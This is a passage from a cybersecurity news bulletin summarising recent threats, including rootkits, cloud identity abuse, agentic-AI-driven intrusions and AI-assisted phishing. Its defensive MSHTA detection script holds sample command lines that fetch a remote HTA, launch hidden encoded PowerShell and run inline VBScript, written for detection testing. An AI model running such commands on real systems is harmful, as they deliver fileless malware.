Security Alert: Linux Rootkits, Router Vulnerabilities, AI Breaches, Scam Kits, and More in This Week’s ThreatsDay Bulletin
into plain text. The attackers rotated XOR keys, shuffled install paths, swapped backdoor credentials, added auditd-evasion hooks, and eventually incorporated a service-side PAM impersonation primitive using OrBit, a fork of the open-source rootkit Medusa. The earliest OrBit sample is believed to have been built from a pre-publication snapshot of the December 2022 Medusa source tree.

The AI-driven intrusions tracked as SHADOW-AETHER-040 and SHADOW-AETHER-064 used agentic AI, with similar tactics, to attack government and financial organizations in Latin America.

Mythos intel sharing has expanded, allowing users to share cybersecurity threat information using Anthropic’s AI model.

Discord has implemented end-to-end encryption for voice and video calls using the DAVE protocol.

Microsoft disclosed a sophisticated attack by Storm-2949 that abused Azure identities to exfiltrate sensitive data from an organization’s high-value assets. According to Microsoft, the attacker used legitimate cloud and Azure management features to gain access and execute remote code on VMs, and to reach sensitive cloud resources such as Key Vaults and storage accounts. This let them move laterally across cloud and endpoint environments while blending in with expected administrative behavior. The attacker also conducted discovery activities, installed ScreenConnect, and attempted to disable Microsoft Defender Antivirus protections.
Apple announced that its App Store prevented over $2.2 billion in potentially fraudulent transactions and rejected over 2 million problematic app submissions in 2025. They also successfully blocked 1.1 billion fraudulent customer account creations, deactivated 40.4 million customer accounts for fraud and abuse, terminated 193,000 developer accounts over fraud concerns, and rejected over 138,000 developer enrollments.
Two U.S. nationals pleaded guilty to running a business that provided services to customers engaged in telemarketing and tech-support fraud schemes. The investigation also led to the conviction of five India-based telemarketing fraudsters for targeting and defrauding Americans.
HP released fixes for a critical heap-based buffer overflow vulnerability in HPLIP that could allow escalation of privileges and arbitrary code execution on Linux endpoints and enterprise print servers.
AhnLab warned of a Telegram-oriented smishing campaign designed to hijack victims’ accounts and steal account information using SMS messages. Threat actors trick users into entering their phone numbers and login codes on phishing sites to compromise accounts.
Zimperium zLabs observed a new Android malware campaign called Premium Deception conducting carrier billing fraud through premium SMS abuse across multiple countries. The malware subscribes users to premium services without their knowledge or consent and sends metadata and subscription confirmations to operators via a Telegram-based exfiltration channel.
A new Brazilian banking trojan called Banana RAT has emerged as the latest malware targeting financial institutions in Brazil. The campaign has been targeting various industries, including financial services, healthcare, and manufacturing.
The Evolution of PureLogs with Async/Await Patterns
The latest iteration of PureLogs makes extensive use of async/await patterns. The change appears intended to make task execution more efficient while making the code harder to analyze, a notable step in how PureLogs completes its tasks and processes the data it handles.
Swiss Post Cybersecurity Unveils Similar Campaign in January 2026
In a parallel development, Swiss Post Cybersecurity documented a similar campaign back in January 2026. That campaign showed the same emphasis on efficient execution and harder-to-analyze code, in line with the broader trend toward more efficient and more sophisticated tooling.
Dark Web Revelation: Card Dump Unleashed by B1ack’s Stash
The notorious B1ack’s Stash carding marketplace on the dark web has announced the release of 4.6 million stolen credit card records, exposing sensitive information including full card numbers, expiration dates, CVV2 codes, cardholder names, billing addresses, email addresses, phone numbers, and IP addresses. Of these records, 4.3 million are deemed fresh and viable for illicit use, posing a significant threat to individuals primarily in the U.S., Canada, the U.K., France, and Malaysia.
Browser-Locking Scareware Emerges with CypherLoc
A new wave of web-based scareware, named CypherLoc, locks the victim’s browser and drives unsuspecting users toward fraudulent tech support services. The kit, identified by Barracuda Networks, has already been used in over 2.8 million attacks since the beginning of 2026. The attack chain typically begins with phishing emails that lead victims to malicious web pages, culminating in a browser-locking scareware interface that coerces victims into seeking immediate support.
AI-Powered Phishing Campaigns at Scale
Recent research has shed light on the potential misuse of publicly available social media data and generative AI (GenAI) to orchestrate large-scale, personalized spear-phishing campaigns. The study conducted by researchers from the University of Texas at Arlington and Louisiana State University showcases the alarming ease with which AI models can extract targeted information to craft convincing phishing campaigns without the need for extensive reconnaissance or stolen databases.
Legacy LOLBIN Exploitation Persists with MSHTA
Despite its legacy status, attackers continue to exploit the Microsoft HTML Application Host (MSHTA) utility for malicious campaigns, as revealed by Bitdefender. The utility, categorized as a Living-off-the-Land binary (LOLBIN), remains a preferred tool for executing multi-stage, fileless malware campaigns involving PowerShell and HTA scripts. This persistent abuse of MSHTA underscores the ongoing challenges in combating sophisticated malware threats.
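Detection logic for the MSHTA-to-PowerShell pattern described above, written as an added example for this bulletin (it is not Bitdefender’s code or any published rule). It runs three rules over constructed Sysmon-style process-creation events: mshta.exe spawning a script host, mshta.exe launched with a remote URL or inline script protocol on its command line, and an Office application spawning mshta.exe. The event field names and the sample command lines are assumptions made for the example.

```python
import re
from typing import Iterable

# Processes that indicate a multi-stage chain when mshta.exe is their parent.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Remote HTA fetch or inline script protocol handler on the mshta command line.
INLINE_OR_REMOTE = re.compile(r"https?://|\b(?:javascript|vbscript):", re.IGNORECASE)

# Constructed Sysmon Event ID 1 style records (parent image, image, command line).
# Sample data for the example, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},          # benign local HTA
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/a.hta"},                    # Office -> remote HTA
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc <base64-omitted>"},    # mshta -> PowerShell
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\MSHTA.EXE",
     "cmdline": "mshta.exe vbscript:Execute(...)"},                        # inline script protocol
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the names of every rule the process-creation event matches."""
    parent, image = basename(event["parent"]), basename(event["image"])
    hits = []
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        hits.append("mshta_spawns_script_host")
    if image == "mshta.exe" and INLINE_OR_REMOTE.search(event["cmdline"]):
        hits.append("mshta_remote_or_inline_script")
    if image == "mshta.exe" and parent in OFFICE_APPS:
        hits.append("office_spawns_mshta")
    return hits


def analyze(events: Iterable[dict]) -> list[tuple[int, str]]:
    """Run every rule over the events and return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

Feed the same rules real process-creation telemetry by mapping your sensor’s parent/image/command-line fields onto the three keys used here; the local-HTA event shows why a bare mshta.exe execution alone is too noisy to alert on.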
U.S. Cybersecurity Agency Faces GovCloud Credential Exposure
A contractor for the U.S. Cybersecurity and Infrastructure Security Agency (CISA) inadvertently exposed highly privileged AWS GovCloud credentials and internal systems on a public GitHub repository. The repository, discovered by GitGuardian, contained sensitive material including plain-text passwords, AWS tokens, and Entra ID SAML certificates. The repository has since been taken offline, but the incident highlights the need for secret scanning and other controls that keep credentials out of source repositories.
Trojanized Apps Cluster Discovered by Palo Alto Networks
Palo Alto Networks Unit 42 has identified a cluster of trojanized apps, collectively known as TamperedChef (EvilAI), comprising 4,000 samples across 100 unique variants. These malicious apps leverage deceptive tactics, including malicious ads, to distribute payloads discreetly. The TamperedChef-style malware exhibits advanced persistence mechanisms, remaining dormant before activating and enabling adversaries to execute various payloads, posing a significant threat to unsuspecting users.
Staying Vigilant in a Dynamic Cybersecurity Landscape
Amidst the rapidly evolving cybersecurity landscape, vigilance and proactive measures are paramount. From dark web revelations to sophisticated phishing campaigns and legacy utility exploitation, the threats are diverse and ever-present. It is crucial to prioritize patching vulnerabilities, scrutinize sources of trust, and remain attentive to even the most seemingly mundane alerts. By staying informed and proactive, individuals and organizations can mitigate risks and navigate the complex cybersecurity terrain with resilience.